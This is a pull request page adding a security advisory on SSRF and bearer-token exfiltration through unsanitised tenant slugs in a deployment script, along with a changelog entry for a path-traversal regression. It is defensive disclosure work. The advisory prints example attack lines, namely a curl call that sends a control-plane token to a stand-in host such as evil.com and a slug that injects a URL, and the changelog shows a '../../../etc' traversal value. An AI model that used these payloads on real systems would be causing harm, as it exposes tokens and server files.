molecule-ai/docs
47
0
Fork 0
Code Issues Pull Requests 11 Actions Packages Projects Releases Wiki Activity

docs(security): add OFFSEC-006 SSRF + token exfiltration advisory #41

Closed
technical-writer wants to merge 3 commits from docs/offsec-006-slug-ssrf-advisory into main
pull from: docs/offsec-006-slug-ssrf-advisory
merge into: molecule-ai:main
Conversation 12 Commits 3 Files Changed 3
+101
3 changed files with 101 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
content/docs/security/changelog.md
+20
View File
@@ -9,6 +9,26 @@ This page documents security fixes shipped in the Molecule AI platform. Each ent
---
## 2026-05-13 — CWE-22: Path Traversal Regression in `org_import.go`
**Severity:** High (CWE-22)
**PR:** [#810](https://git.moleculesai.app/molecule-ai/molecule-core/pull/810)
**Affected:** `org_import.go``createWorkspaceTree`
### Vulnerability
A regression removed the `resolveInsideRoot` path-traversal guard from `createWorkspaceTree`. A malicious org YAML with `filesDir: "../../../etc"` could read arbitrary server files through the org template import path.
### Fix
Replaced unprotected `parseEnvFile` calls with `loadWorkspaceEnv` which applies `resolveInsideRoot` validation before accessing any path.
### User-facing summary
Org template imports now correctly validate all file paths before accessing them. Attempts to traverse outside the workspace root are rejected.
---
## 2026-04-20 — CWE-22: Path Traversal in `copyFilesToContainer`
**Severity:** High (CWE-22)
content/docs/security/index.mdx
+2
View File
@@ -5,5 +5,7 @@ description: Security guides, advisories, and coverage reports for the Molecule
## In this section
- [OFFSEC-006: Tenant Slug SSRF + Token Exfiltration (2026-05-14)](/docs/security/offsec-006-slug-ssrf-advisory) —
HIGH severity — SSRF and bearer-token exfiltration via unsanitised tenant slug in self-hosted deployment scripts
- [SAFE-MCP Security Advisory (2026-04-17)](/docs/security/safe-mcp-advisory) —
Three HIGH-severity findings for self-hosted operators
content/docs/security/offsec-006-slug-ssrf-advisory.mdx
+79
View File
@@ -0,0 +1,79 @@
---
title: "OFFSEC-006: Tenant Slug SSRF + Token Exfiltration (2026-05-14)"
description: High-severity SSRF and bearer-token exfiltration via unsanitised tenant slug interpolation in self-hosted deployment scripts.
---
## Advisory overview
**Severity:** HIGH
**CWE:** [CWE-918](https://cwe.mitre.org/data/definitions/918.html) (SSRF) + [CWE-20](https://cwe.mitre.edu/data/definitions/20.html) (Improper Input Validation)
**Affected file:** `scripts/promote-tenant-image.sh`
**Affected versions:** All self-hosted deployments prior to the fix in `molecule-core` PR [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pull/933)
**Fixed in:** `molecule-core` #933 (2026-05-14)
**SaaS impact:** None — the platform applies the fix server-side
This advisory documents a high-severity Server-Side Request Forgery (SSRF) and bearer-token exfiltration vulnerability in the tenant promotion script used by self-hosted operators.
---
## Vulnerability details
Tenant slugs were interpolated directly into URL paths and ECR repository identifiers without any sanitisation.
### Affected code pattern
```bash
# Vulnerable — slug inserted into URL path unchecked
SLUG="?url=https://attacker.com"
curl "${PLATFORM_URL}/cp_redeploy_tenant/${SLUG}" # SSRF
curl "?url=https://evil.com&token=${CP_TOKEN}" # Token exfiltration
```
A malicious tenant slug such as `?url=https://attacker.com&token=$CP_TOKEN` passed to `promote-tenant-image.sh` could cause the platform to:
1. **SSRF** — redirect HTTP calls to an attacker-controlled host by injecting a URL parameter
2. **Bearer-token exfiltration** — the platform's `CP_TOKEN` appears in the attacker's server access logs via the same URL parameter injection
### Secondary attack: glob expansion
Bash glob metacharacters (`*`, `?`, `[`) in slug values were subject to pathname expansion, allowing a slug like `evil?url=https://attacker.com` to expand to a list of filenames before being passed to curl.
---
## Recommended mitigations
### Upgrade (self-hosted operators)
If you are running a self-hosted control plane, upgrade to the latest `molecule-core` build that includes `molecule-core` PR [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pull/933).
After upgrading, tenant slugs are validated against RFC-1123 before any network call:
```bash
# Invalid slugs are rejected with exit code 64
$ ./promote-tenant-image.sh "?url=https://evil.com"
Error: invalid tenant slug "?url=https://evil.com" — must match ^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$
```
### If you cannot upgrade immediately
Audit your tenant slugs manually. Any slug containing the characters `?`, `#`, `&`, `$`, `/`, `\`, or spaces is a potential exploit vector. Rename affected tenants with clean slugs matching `^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$`.
---
## Fix summary
Fix adds `validate_slug()` (new function) — RFC-1123 regex validation (`^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$`), exits with code 64 on invalid slugs before any network call.
---
## Credit
Found and fixed by the Molecule AI security team during internal code review.
---
## Related advisories
- [SAFE-MCP Security Advisory](./safe-mcp-advisory.mdx) — April 2026 audit findings (G-01 through G-03)
- [Security Changelog](./changelog.md) — full history of security fixes
- [OWASP Agentic Top 10](./owasp-agentic-top-10.mdx) — risk framework reference